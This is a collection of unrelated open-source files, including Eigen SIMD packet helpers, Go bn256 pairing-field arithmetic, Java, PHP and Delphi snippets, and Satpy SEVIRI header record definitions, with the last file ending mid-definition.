template<typename Scalar, typename Packet, int Alignment>
EIGEN_DEVICE_FUNC EIGEN_ALWAYS_INLINE void pstoret(Scalar* to, const Packet& from)
{
if(Alignment >= unpacket_traits<Packet>::alignment)
pstore(to, from);
else
pstoreu(to, from);
}
/** \internal \returns a packet version of \a *from.
* Unlike ploadt, ploadt_ro takes advantage of the read-only memory path on the
* hardware if available to speedup the loading of data that won't be modified
* by the current computation.
*/
template<typename Packet, int LoadMode>
EIGEN_DEVICE_FUNC EIGEN_ALWAYS_INLINE Packet ploadt_ro(const typename unpacket_traits<Packet>::type* from)
{
return ploadt<Packet, LoadMode>(from);
}
/** \internal default implementation of palign() allowing partial specialization */
template<int Offset,typename PacketType>
struct palign_impl
{
// by default data are aligned, so there is nothing to be done :)
static inline void run(PacketType&, const PacketType&) {}
};
/** \internal update \a first using the concatenation of the packet_size minus \a Offset last elements
* of \a first and \a Offset first elements of \a second.
*
* This function is currently only used to optimize matrix-vector products on unligned matrices.
* It takes 2 packets that represent a contiguous memory array, and returns a packet starting
* at the position \a Offset. For instance, for packets of 4 elements, we have:
* Input:
* - first = {f0,f1,f2,f3}
* - second = {s0,s1,s2,s3}
* Output:
* - if Offset==0 then {f0,f1,f2,f3}
* - if Offset==1 then {f1,f2,f3,s0}
* - if Offset==2 then {f2,f3,s0,s1}
* - if Offset==3 then {f3,s0,s1,s3}
*/
template<int Offset,typename PacketType>
inline void palign(PacketType& first, const PacketType& second)
{
palign_impl<Offset,PacketType>::run(first,second);
}
/***************************************************************************
* Fast complex products (GCC generates a function call which is very slow)
***************************************************************************/
// Eigen+CUDA does not support complexes.
#ifndef __CUDACC__
template<> inline std::complex<float> pmul(const std::complex<float>& a, const std::complex<float>& b)
{ return std::complex<float>(a.real()*b.real() - a.imag()*b.imag(), a.imag()*b.real() + a.real()*b.imag()); }
template<> inline std::complex<double> pmul(const std::complex<double>& a, const std::complex<double>& b)
{ return std::complex<double>(a.real()*b.real() - a.imag()*b.imag(), a.imag()*b.real() + a.real()*b.imag()); }
#endif
/***************************************************************************
* PacketBlock, that is a collection of N packets where the number of words
* in the packet is a multiple of N.
***************************************************************************/
template <typename Packet,int N=unpacket_traits<Packet>::size> struct PacketBlock {
Packet packet[N];
};
template<typename Packet> EIGEN_DEVICE_FUNC inline void
ptranspose(PacketBlock<Packet,1>& /*kernel*/) {
// Nothing to do in the scalar case, i.e. a 1x1 matrix.
}
/***************************************************************************
* Selector, i.e. vector of N boolean values used to select (i.e. blend)
* words from 2 packets.
***************************************************************************/
template <size_t N> struct Selector {
bool select[N];
};
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pblend(const Selector<unpacket_traits<Packet>::size>& ifPacket, const Packet& thenPacket, const Packet& elsePacket) {
return ifPacket.select[0] ? thenPacket : elsePacket;
}
/** \internal \returns \a a with the first coefficient replaced by the scalar b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pinsertfirst(const Packet& a, typename unpacket_traits<Packet>::type b)
{
// Default implementation based on pblend.
// It must be specialized for higher performance.
Selector<unpacket_traits<Packet>::size> mask;
mask.select[0] = true;
// This for loop should be optimized away by the compiler.
for(Index i=1; i<unpacket_traits<Packet>::size; ++i)
mask.select[i] = false;
return pblend(mask, pset1<Packet>(b), a);
}
/** \internal \returns \a a with the last coefficient replaced by the scalar b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pinsertlast(const Packet& a, typename unpacket_traits<Packet>::type b)
{
// Default implementation based on pblend.
// It must be specialized for higher performance.
Selector<unpacket_traits<Packet>::size> mask;
// This for loop should be optimized away by the compiler.
for(Index i=0; i<unpacket_traits<Packet>::size-1; ++i)
mask.select[i] = false;
mask.select[unpacket_traits<Packet>::size-1] = true;
return pblend(mask, pset1<Packet>(b), a);
}
} // end namespace internal
} // end namespace Eigen
#endif // EIGEN_GENERIC_PACKET_MATH_H
| {
"pile_set_name": "Github"
} |
package com.jojoldu.blogcode.springbootjpa.querydsl.store;
import com.jojoldu.blogcode.springbootjpa.domain.QStore;
import com.jojoldu.blogcode.springbootjpa.domain.Store;
import com.querydsl.jpa.impl.JPAQueryFactory;
import lombok.RequiredArgsConstructor;
import java.util.List;
import static com.jojoldu.blogcode.springbootjpa.domain.QStore.store;
/**
* Created by [email protected] on 03/11/2019
* Blog : http://jojoldu.tistory.com
* Github : http://github.com/jojoldu
*/
@RequiredArgsConstructor
public class StoreQuerydslRepositoryImpl implements StoreQuerydslRepositoryCustom {
private final JPAQueryFactory queryFactory;
@Override
public List<Store> findAllByQuerydsl () {
return queryFactory.selectFrom(store)
.join(store.employees).fetchJoin()
.join(store.products).fetchJoin()
.fetch();
}
}
| {
"pile_set_name": "Github"
} |
<?php
use Illuminate\Foundation\Inspiring;
use Illuminate\Support\Facades\Artisan;
/*
|--------------------------------------------------------------------------
| Console Routes
|--------------------------------------------------------------------------
|
| This file is where you may define all of your Closure based console
| commands. Each Closure is bound to a command instance allowing a
| simple approach to interacting with each command's IO methods.
|
*/
Artisan::command('inspire', function () {
$this->comment(Inspiring::quote());
})->purpose('Display an inspiring quote');
| {
"pile_set_name": "Github"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package bn256
// For details of the algorithms used, see "Multiplication and Squaring on
// Pairing-Friendly Fields, Devegili et al.
// http://eprint.iacr.org/2006/471.pdf.
import (
"math/big"
)
// gfP6 implements the field of size p⁶ as a cubic extension of gfP2 where τ³=ξ
// and ξ=i+3.
type gfP6 struct {
x, y, z *gfP2 // value is xτ² + yτ + z
}
func newGFp6(pool *bnPool) *gfP6 {
return &gfP6{newGFp2(pool), newGFp2(pool), newGFp2(pool)}
}
func (e *gfP6) String() string {
return "(" + e.x.String() + "," + e.y.String() + "," + e.z.String() + ")"
}
func (e *gfP6) Put(pool *bnPool) {
e.x.Put(pool)
e.y.Put(pool)
e.z.Put(pool)
}
func (e *gfP6) Set(a *gfP6) *gfP6 {
e.x.Set(a.x)
e.y.Set(a.y)
e.z.Set(a.z)
return e
}
func (e *gfP6) SetZero() *gfP6 {
e.x.SetZero()
e.y.SetZero()
e.z.SetZero()
return e
}
func (e *gfP6) SetOne() *gfP6 {
e.x.SetZero()
e.y.SetZero()
e.z.SetOne()
return e
}
func (e *gfP6) Minimal() {
e.x.Minimal()
e.y.Minimal()
e.z.Minimal()
}
func (e *gfP6) IsZero() bool {
return e.x.IsZero() && e.y.IsZero() && e.z.IsZero()
}
func (e *gfP6) IsOne() bool {
return e.x.IsZero() && e.y.IsZero() && e.z.IsOne()
}
func (e *gfP6) Negative(a *gfP6) *gfP6 {
e.x.Negative(a.x)
e.y.Negative(a.y)
e.z.Negative(a.z)
return e
}
func (e *gfP6) Frobenius(a *gfP6, pool *bnPool) *gfP6 {
e.x.Conjugate(a.x)
e.y.Conjugate(a.y)
e.z.Conjugate(a.z)
e.x.Mul(e.x, xiTo2PMinus2Over3, pool)
e.y.Mul(e.y, xiToPMinus1Over3, pool)
return e
}
// FrobeniusP2 computes (xτ²+yτ+z)^(p²) = xτ^(2p²) + yτ^(p²) + z
func (e *gfP6) FrobeniusP2(a *gfP6) *gfP6 {
// τ^(2p²) = τ²τ^(2p²-2) = τ²ξ^((2p²-2)/3)
e.x.MulScalar(a.x, xiTo2PSquaredMinus2Over3)
// τ^(p²) = ττ^(p²-1) = τξ^((p²-1)/3)
e.y.MulScalar(a.y, xiToPSquaredMinus1Over3)
e.z.Set(a.z)
return e
}
func (e *gfP6) Add(a, b *gfP6) *gfP6 {
e.x.Add(a.x, b.x)
e.y.Add(a.y, b.y)
e.z.Add(a.z, b.z)
return e
}
func (e *gfP6) Sub(a, b *gfP6) *gfP6 {
e.x.Sub(a.x, b.x)
e.y.Sub(a.y, b.y)
e.z.Sub(a.z, b.z)
return e
}
func (e *gfP6) Double(a *gfP6) *gfP6 {
e.x.Double(a.x)
e.y.Double(a.y)
e.z.Double(a.z)
return e
}
func (e *gfP6) Mul(a, b *gfP6, pool *bnPool) *gfP6 {
// "Multiplication and Squaring on Pairing-Friendly Fields"
// Section 4, Karatsuba method.
// http://eprint.iacr.org/2006/471.pdf
v0 := newGFp2(pool)
v0.Mul(a.z, b.z, pool)
v1 := newGFp2(pool)
v1.Mul(a.y, b.y, pool)
v2 := newGFp2(pool)
v2.Mul(a.x, b.x, pool)
t0 := newGFp2(pool)
t0.Add(a.x, a.y)
t1 := newGFp2(pool)
t1.Add(b.x, b.y)
tz := newGFp2(pool)
tz.Mul(t0, t1, pool)
tz.Sub(tz, v1)
tz.Sub(tz, v2)
tz.MulXi(tz, pool)
tz.Add(tz, v0)
t0.Add(a.y, a.z)
t1.Add(b.y, b.z)
ty := newGFp2(pool)
ty.Mul(t0, t1, pool)
ty.Sub(ty, v0)
ty.Sub(ty, v1)
t0.MulXi(v2, pool)
ty.Add(ty, t0)
t0.Add(a.x, a.z)
t1.Add(b.x, b.z)
tx := newGFp2(pool)
tx.Mul(t0, t1, pool)
tx.Sub(tx, v0)
tx.Add(tx, v1)
tx.Sub(tx, v2)
e.x.Set(tx)
e.y.Set(ty)
e.z.Set(tz)
t0.Put(pool)
t1.Put(pool)
tx.Put(pool)
ty.Put(pool)
tz.Put(pool)
v0.Put(pool)
v1.Put(pool)
v2.Put(pool)
return e
}
func (e *gfP6) MulScalar(a *gfP6, b *gfP2, pool *bnPool) *gfP6 {
e.x.Mul(a.x, b, pool)
e.y.Mul(a.y, b, pool)
e.z.Mul(a.z, b, pool)
return e
}
func (e *gfP6) MulGFP(a *gfP6, b *big.Int) *gfP6 {
e.x.MulScalar(a.x, b)
e.y.MulScalar(a.y, b)
e.z.MulScalar(a.z, b)
return e
}
// MulTau computes τ·(aτ²+bτ+c) = bτ²+cτ+aξ
func (e *gfP6) MulTau(a *gfP6, pool *bnPool) {
tz := newGFp2(pool)
tz.MulXi(a.x, pool)
ty := newGFp2(pool)
ty.Set(a.y)
e.y.Set(a.z)
e.x.Set(ty)
e.z.Set(tz)
tz.Put(pool)
ty.Put(pool)
}
func (e *gfP6) Square(a *gfP6, pool *bnPool) *gfP6 {
v0 := newGFp2(pool).Square(a.z, pool)
v1 := newGFp2(pool).Square(a.y, pool)
v2 := newGFp2(pool).Square(a.x, pool)
c0 := newGFp2(pool).Add(a.x, a.y)
c0.Square(c0, pool)
c0.Sub(c0, v1)
c0.Sub(c0, v2)
c0.MulXi(c0, pool)
c0.Add(c0, v0)
c1 := newGFp2(pool).Add(a.y, a.z)
c1.Square(c1, pool)
c1.Sub(c1, v0)
c1.Sub(c1, v1)
xiV2 := newGFp2(pool).MulXi(v2, pool)
c1.Add(c1, xiV2)
c2 := newGFp2(pool).Add(a.x, a.z)
c2.Square(c2, pool)
c2.Sub(c2, v0)
c2.Add(c2, v1)
c2.Sub(c2, v2)
e.x.Set(c2)
e.y.Set(c1)
e.z.Set(c0)
v0.Put(pool)
v1.Put(pool)
v2.Put(pool)
c0.Put(pool)
c1.Put(pool)
c2.Put(pool)
xiV2.Put(pool)
return e
}
func (e *gfP6) Invert(a *gfP6, pool *bnPool) *gfP6 {
// See "Implementing cryptographic pairings", M. Scott, section 3.2.
// ftp://136.206.11.249/pub/crypto/pairings.pdf
// Here we can give a short explanation of how it works: let j be a cubic root of
// unity in GF(p²) so that 1+j+j²=0.
// Then (xτ² + yτ + z)(xj²τ² + yjτ + z)(xjτ² + yj²τ + z)
// = (xτ² + yτ + z)(Cτ²+Bτ+A)
// = (x³ξ²+y³ξ+z³-3ξxyz) = F is an element of the base field (the norm).
//
// On the other hand (xj²τ² + yjτ + z)(xjτ² + yj²τ + z)
// = τ²(y²-ξxz) + τ(ξx²-yz) + (z²-ξxy)
//
// So that's why A = (z²-ξxy), B = (ξx²-yz), C = (y²-ξxz)
t1 := newGFp2(pool)
A := newGFp2(pool)
A.Square(a.z, pool)
t1.Mul(a.x, a.y, pool)
t1.MulXi(t1, pool)
A.Sub(A, t1)
B := newGFp2(pool)
B.Square(a.x, pool)
B.MulXi(B, pool)
t1.Mul(a.y, a.z, pool)
B.Sub(B, t1)
C := newGFp2(pool)
C.Square(a.y, pool)
t1.Mul(a.x, a.z, pool)
C.Sub(C, t1)
F := newGFp2(pool)
F.Mul(C, a.y, pool)
F.MulXi(F, pool)
t1.Mul(A, a.z, pool)
F.Add(F, t1)
t1.Mul(B, a.x, pool)
t1.MulXi(t1, pool)
F.Add(F, t1)
F.Invert(F, pool)
e.x.Mul(C, F, pool)
e.y.Mul(B, F, pool)
e.z.Mul(A, F, pool)
t1.Put(pool)
A.Put(pool)
B.Put(pool)
C.Put(pool)
F.Put(pool)
return e
}
| {
"pile_set_name": "Github"
} |
##Package: StdCtrls
##Status: Completed (I)
----------------------------------------------------------------------------------------------------
@@JvSystemPopup.pas
Summary
Contains the TJvSystemPopup component.
Author
Sébastien Buysse
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.PositionInMenu
Summary
Specifies where in the system menu the popup menu items are inserted.
Description
Use PositionInMenu to specify whether the menu items of the popup menu specified by Popup are
inserted at the top or of the system menu, or at the bottom.
See Also
TJvSystemPopup.Position
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Position
Summary
Specifies in which system menu the popup menu items are inserted.
Description
Use Position to specify whether the popup menu is inserted in the forms system menu, the
application's system menu, or isn't inserted at all.
These are the possible values of Position:
<TABLE>
Value Meaning
------------- ---------------------------------------------------------------------------
ppNone The popup menu isn't inserted in a system menu.
ppForm The popup menu is inserted in the system menu of the form. Access this
system menu by right-clicking on the forms title bar.
ppApplication The popup menu is inserted in the system menu of the application. Access
this system menu by right-clicking the window button on the taskbar that
is associated with the application.
</TABLE>
See Also
TJvSystemPopup.Popup, TJvSystemPopup.PositionInMenu
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Popup
Summary
Identifies a pop-up menu associated with the component.
Description
Use Popup to associate a pop-up menu with TJvSystemPopup. The component adds the menu items of the
pop-up menu to the system menu.
See Also
TJvSystemPopup.Position
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Notification
Summary
Responds to notifications when objects are about to be created or destroyed.
Description
Notification is called automatically when components are created or destroyed. After calling the
inherited method, Notification checks whether the component specified by the Popup property is
about to be destroyed. If the component is going away, Notification sets the Popup property to nil.
Parameters
AComponent - Identifies the component that is about to be created or destroyed.
Operation - Specifies whether the component is about to be created or destroyed.
See Also
TJvSystemPopup.Popup
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Destroy
Summary
Destroys an instance of TJvSystemPopup
Description
Do not call Destroy directly in an application. Instead, call Free. Free verifies that the
TJvSystemPopup object is not nil and only then calls Destroy.
See Also
TJvSystemPopup.Create
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Create
Summary
Creates and initializes a new TJvSystemPopup object.
Description
Use \Create to create and initialize a new TJvSystemPopup object.
\Create calls the inherited \Create method, then sets the initial values for the component as
follows:
* Position is set to ppNone.
* PositionInMenu is set to pmTop.
Parameters
AOwner - A component, typically the form, that is responsible for freeing the component.
See Also
TJvSystemPopup.Position, TJvSystemPopup.PositionInMenu
----------------------------------------------------------------------------------------------------
@@TJvPositionInMenu.pmBottom
Inserts the menu items of the popup menu at the bottom of the system menu.
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup
<TITLEIMG TJvSystemPopup>
#JVCLInfo
<GROUP JVCL.FormsAndApp.Application>
<FLAG Component>
Summary
Adds menu items to the system menu.
Description
Use TJvSystemPopup to add menu items to the system menu (also known as the system menu or the
control menu).
Use Popup to associate a pop-up menu with TJvSystemPopup. TJvSystemPopup adds the menu items of the
pop-up menu to the system menu.
Use Position to specify whether the popup menu is inserted in the forms system menu, the
application's system menu, or isn't inserted at all. Use PositionInMenu to specify where the menu
items are inserted in the system menu: at the bottom or at the top.
----------------------------------------------------------------------------------------------------
@@TJvPositionInMenu
<TITLE TJvPositionInMenu type>
Summary
Represents different kinds of positions in a system menu.
Description
Use the TJvPositionInMenu type to specify a position in a system menu.
----------------------------------------------------------------------------------------------------
@@TJvPositionInMenu.pmTop
Inserts the menu items of the popup menu at the top of the system menu.
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Refresh
Summary
Refreshes the system menu.
Description
Call Refresh to refresh the system menu. Refresh resets the window menu back to the default state,
Parameters
SystemReset - Specifies whether to reset the system menu.
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.spinnaker.cats.cache;
import com.netflix.spinnaker.kork.annotations.Beta;
import java.util.Collection;
import java.util.Map;
/**
* CacheData is stored in a Cache. Attributes are facts about the CacheData that can be updated by
* CachingAgents. Relationships are links to other CacheData.
*
* <p>Note: Not all caches may support a per record ttl
*/
@Beta
public interface CacheData {
String getId();
/** @return The ttl (in seconds) for this CacheData */
int getTtlSeconds();
Map<String, Object> getAttributes();
/**
* @return relationships for this CacheData, keyed by type returning a collection of ids for that
* type
*/
Map<String, Collection<String>> getRelationships();
}
| {
"pile_set_name": "Github"
} |
{
"navigationBarTitleText": "打电话"
}
| {
"pile_set_name": "Github"
} |
<vector xmlns:android="http://schemas.android.com/apk/res/android"
android:width="24dp"
android:height="24dp"
android:viewportWidth="24.0"
android:viewportHeight="24.0">
<path
android:fillColor="#FF000000"
android:pathData="M11.99,2C6.47,2 2,6.48 2,12s4.47,10 9.99,10C17.52,22 22,17.52 22,12S17.52,2 11.99,2zM12,20c-4.42,0 -8,-3.58 -8,-8s3.58,-8 8,-8 8,3.58 8,8 -3.58,8 -8,8zM15.5,11c0.83,0 1.5,-0.67 1.5,-1.5S16.33,8 15.5,8 14,8.67 14,9.5s0.67,1.5 1.5,1.5zM8.5,11c0.83,0 1.5,-0.67 1.5,-1.5S9.33,8 8.5,8 7,8.67 7,9.5 7.67,11 8.5,11zM12,14c-2.33,0 -4.31,1.46 -5.11,3.5h10.22c-0.8,-2.04 -2.78,-3.5 -5.11,-3.5z"/>
</vector>
| {
"pile_set_name": "Github"
} |
//
// Copyright (c) ZeroC, Inc. All rights reserved.
//
package Ice;
/**
* Instantiates user exceptions.
*
* @see InputStream#throwException
**/
public interface UserExceptionFactory
{
/**
* Instantiate a user exception with the given Slice type ID (such as <code>::Module::MyException</code>)
* and throw it. If the implementation does not throw an exception, the Ice run time will fall back
* to using its default behavior for instantiating the user exception.
*
* @param typeId The Slice type ID of the user exception to be created.
* @throws UserException A user exception instance corresponding to the type ID.
**/
void createAndThrow(String typeId)
throws UserException;
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.tencentcloudapi.mps.v20190612.models;
import com.tencentcloudapi.common.AbstractModel;
import com.google.gson.annotations.SerializedName;
import com.google.gson.annotations.Expose;
import java.util.HashMap;
public class DescribeSampleSnapshotTemplatesResponse extends AbstractModel{
/**
* 符合过滤条件的记录总数。
*/
@SerializedName("TotalCount")
@Expose
private Long TotalCount;
/**
* 采样截图模板详情列表。
*/
@SerializedName("SampleSnapshotTemplateSet")
@Expose
private SampleSnapshotTemplate [] SampleSnapshotTemplateSet;
/**
* 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
*/
@SerializedName("RequestId")
@Expose
private String RequestId;
/**
* Get 符合过滤条件的记录总数。
* @return TotalCount 符合过滤条件的记录总数。
*/
public Long getTotalCount() {
return this.TotalCount;
}
/**
* Set 符合过滤条件的记录总数。
* @param TotalCount 符合过滤条件的记录总数。
*/
public void setTotalCount(Long TotalCount) {
this.TotalCount = TotalCount;
}
/**
* Get 采样截图模板详情列表。
* @return SampleSnapshotTemplateSet 采样截图模板详情列表。
*/
public SampleSnapshotTemplate [] getSampleSnapshotTemplateSet() {
return this.SampleSnapshotTemplateSet;
}
/**
* Set 采样截图模板详情列表。
* @param SampleSnapshotTemplateSet 采样截图模板详情列表。
*/
public void setSampleSnapshotTemplateSet(SampleSnapshotTemplate [] SampleSnapshotTemplateSet) {
this.SampleSnapshotTemplateSet = SampleSnapshotTemplateSet;
}
/**
* Get 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
* @return RequestId 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
*/
public String getRequestId() {
return this.RequestId;
}
/**
* Set 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
* @param RequestId 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
*/
public void setRequestId(String RequestId) {
this.RequestId = RequestId;
}
/**
* Internal implementation, normal users should not use it.
*/
public void toMap(HashMap<String, String> map, String prefix) {
this.setParamSimple(map, prefix + "TotalCount", this.TotalCount);
this.setParamArrayObj(map, prefix + "SampleSnapshotTemplateSet.", this.SampleSnapshotTemplateSet);
this.setParamSimple(map, prefix + "RequestId", this.RequestId);
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2019 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Header and trailer records of SEVIRI native format.
"""
import numpy as np
from satpy.readers.eum_base import (time_cds_short, time_cds,
time_cds_expanded)
class GSDTRecords(object):
"""MSG Ground Segment Data Type records.
Reference Document (EUM/MSG/SPE/055):
MSG Ground Segment Design Specification (GSDS)
"""
gp_fac_env = np.uint8
gp_fac_id = np.uint8
gp_sc_id = np.uint16
gp_su_id = np.uint32
gp_svce_type = np.uint8
# 4 bytes
gp_cpu_address = [
('Qualifier_1', np.uint8),
('Qualifier_2', np.uint8),
('Qualifier_3', np.uint8),
('Qualifier_4', np.uint8)
]
# 22 bytes
gp_pk_header = [
('HeaderVersionNo', np.uint8),
('PacketType', np.uint8),
('SubHeaderType', np.uint8),
('SourceFacilityId', gp_fac_id),
('SourceEnvId', gp_fac_env),
('SourceInstanceId', np.uint8),
('SourceSUId', gp_su_id),
('SourceCPUId', gp_cpu_address),
('DestFacilityId', gp_fac_id),
('DestEnvId', gp_fac_env),
('SequenceCount', np.uint16),
('PacketLength', np.int32)
]
# 16 bytes
gp_pk_sh1 = [
('SubHeaderVersionNo', np.uint8),
('ChecksumFlag', np.bool),
('Acknowledgement', (np.uint8, 4)),
('ServiceType', gp_svce_type),
('ServiceSubtype', np.uint8),
('PacketTime', time_cds_short),
('SpacecraftId', gp_sc_id)
]
class Msg15NativeHeaderRecord(object):
"""
SEVIRI Level 1.5 header for native-format
"""
def get(self):
# 450400 bytes
record = [
('15_MAIN_PRODUCT_HEADER', L15MainProductHeaderRecord().get()),
('15_SECONDARY_PRODUCT_HEADER',
L15SecondaryProductHeaderRecord().get()),
('GP_PK_HEADER', GSDTRecords.gp_pk_header),
('GP_PK_SH1', GSDTRecords.gp_pk_sh1),
('15_DATA_HEADER', L15DataHeaderRecord().get())
]
return np.dtype(record).newbyteorder('>')
class L15PhData(object):
# 80 bytes
l15_ph_data = [
('Name', 'S30'),
('Value', 'S50')
]
class L15MainProductHeaderRecord(object):
"""
Reference Document:
MSG Level 1.5 Native Format File Definition
"""
def get(self):
l15_ph_data = L15PhData.l15_ph_data
l15_ph_data_identification = [
('Name', 'S30'),
('Size', 'S16'),
('Address', 'S16')
]
# 3674 bytes
record = [
('FormatName', l15_ph_data),
('FormatDocumentName', l15_ph_data),
('FormatDocumentMajorVersion', l15_ph_data),
('FormatDocumentMinorVersion', l15_ph_data),
('CreationDateTime', l15_ph_data),
('CreatingCentre', l15_ph_data),
('DataSetIdentification', (l15_ph_data_identification, 27)),
('TotalFileSize', l15_ph_data),
('GORT', l15_ph_data),
('ASTI', l15_ph_data),
('LLOS', l15_ph_data),
('SNIT', l15_ph_data),
('AIID', l15_ph_data),
('SSBT', l15_ph_data),
('SSST', l15_ph_data),
('RRCC', l15_ph_data),
('RRBT', l15_ph_data),
('RRST', l15_ph_data),
('PPRC', l15_ph_data),
('PPDT', l15_ph_data),
('GPLV', l15_ph_data),
('APNM', l15_ph_data),
('AARF', l15_ph_data),
('UUDT', l15_ph_data),
('QQOV', l15_ph_data),
('UDSP', l15_ph_data)
]
return record
class L15SecondaryProductHeaderRecord(object):
"""
Reference Document:
MSG Level 1.5 Native Format File Definition
"""
def get(self):
l15_ph_data = L15PhData.l15_ph_data
# 1440 bytes
record = [
('ABID', l15_ph_data),
('SMOD', l15_ph_data),
('APXS', l15_ph_data),
('AVPA', l15_ph_data),
('LSCD', l15_ph_data),
('LMAP', l15_ph_data),
('QDLC', l15_ph_data),
('QDLP', l15_ph_data),
('QQAI', l15_ph_data),
('SelectedBandIDs', l15_ph_data),
('SouthLineSelectedRectangle', l15_ph_data),
('NorthLineSelectedRectangle', l15_ph_data),
('EastColumnSelectedRectangle', l15_ph_data),
('WestColumnSelectedRectangle', l15_ph_data),
('NumberLinesVISIR', l15_ph_data),
('NumberColumnsVISIR', l15_ph_data),
('NumberLinesHRV', l15_ph_data),
('NumberColumnsHRV', l15_ph_data)
]
return record
class L15DataHeaderRecord(object):
"""
Reference Document (EUM/MSG/ICD/105):
MSG Level 1.5 Image Data Format Description
"""
def get(self):
# 445248 bytes
record = [
('15HeaderVersion', np.uint8),
('SatelliteStatus', self.satellite_status),
('ImageAcquisition', self.image_acquisition),
('CelestialEvents', self.celestial_events),
('ImageDescription', self.image_description),
('RadiometricProcessing', self.radiometric_processing),
('GeometricProcessing', self.geometric_processing),
('IMPFConfiguration', self.impf_configuration)]
return record
@property
def satellite_status(self):
# 7 bytes
satellite_definition = [
('SatelliteId', np.uint16),
('NominalLongitude', np.float32),
('SatelliteStatus', np.uint8)]
# 28 bytes
satellite_operations = [
('LastManoeuvreFlag', np.bool),
('LastManoeuvreStartTime', time_cds_short),
('LastManoeuvreEndTime', time_cds_short),
('LastManoeuvreType', np.uint8),
('NextManoeuvreFlag', np.bool),
('NextManoeuvreStartTime', time_cds_short),
('NextManoeuvreEndTime', time_cds_short),
('NextManoeuvreType', np.uint8)]
# 396 bytes
orbit_coeff = [
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('X', (np.float64, 8)),
('Y', (np.float64, 8)),
('Z', (np.float64, 8)),
('VX', (np.float64, 8)),
('VY', (np.float64, 8)),
('VZ', (np.float64, 8))]
# 39612 bytes
orbit = [
('PeriodStartTime', time_cds_short),
('PeriodEndTime', time_cds_short),
('OrbitPolynomial', (orbit_coeff, 100))]
# 204 bytes
attitude_coeff = [
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('XofSpinAxis', (np.float64, 8)),
('YofSpinAxis', (np.float64, 8)),
('ZofSpinAxis', (np.float64, 8))]
# 20420 bytes
attitude = [
('PeriodStartTime', time_cds_short),
('PeriodEndTime', time_cds_short),
('PrincipleAxisOffsetAngle', np.float64),
('AttitudePolynomial', (attitude_coeff, 100))]
# 59 bytes
utc_correlation = [
('PeriodStartTime', time_cds_short),
('PeriodEndTime', time_cds_short),
('OnBoardTimeStart', (np.uint8, 7)),
('VarOnBoardTimeStart', np.float64),
('A1', np.float64),
('VarA1', np.float64),
('A2', np.float64),
('VarA2', np.float64)]
# 60134 bytes
record = [
('SatelliteDefinition', satellite_definition),
('SatelliteOperations', satellite_operations),
('Orbit', orbit),
('Attitude', attitude),
('SpinRetreatRCStart', np.float64),
('UTCCorrelation', utc_correlation)]
return record
@property
def image_acquisition(self):
planned_acquisition_time = [
('TrueRepeatCycleStart', time_cds_expanded),
('PlanForwardScanEnd', time_cds_expanded),
('PlannedRepeatCycleEnd', time_cds_expanded)]
radiometer_status = [
('ChannelStatus', (np.uint8, 12)),
('DetectorStatus', (np.uint8, 42))]
hrv_frame_offsets = [
('MDUNomHRVDelay1', np.uint16),
('MDUNomHRVDelay2', np.uint16),
('Spare', np.uint16),
('MDUNomHRVBreakLine', np.uint16)]
operation_parameters = [
('L0_LineCounter', np.uint16),
('K1_RetraceLines', np.uint16),
('K2_PauseDeciseconds', np.uint16),
('K3_RetraceLines', np.uint16),
('K4_PauseDeciseconds', np.uint16),
('K5_RetraceLines', np.uint16),
('XDeepSpaceWindowPosition', np.uint8)]
radiometer_settings = [
('MDUSamplingDelays', (np.uint16, 42)),
('HRVFrameOffsets', hrv_frame_offsets),
('DHSSSynchSelection', np.uint8),
('MDUOutGain', (np.uint16, 42)),
('MDUCoarseGain', (np.uint8, 42)),
('MDUFineGain', (np.uint16, 42)),
('MDUNumericalOffset', (np.uint16, 42)),
('PUGain', (np.uint16, 42)),
('PUOffset', (np.uint16, 27)),
('PUBias', (np.uint16, 15)),
('OperationParameters', operation_parameters),
('RefocusingLines', np.uint16),
('RefocusingDirection', np.uint8),
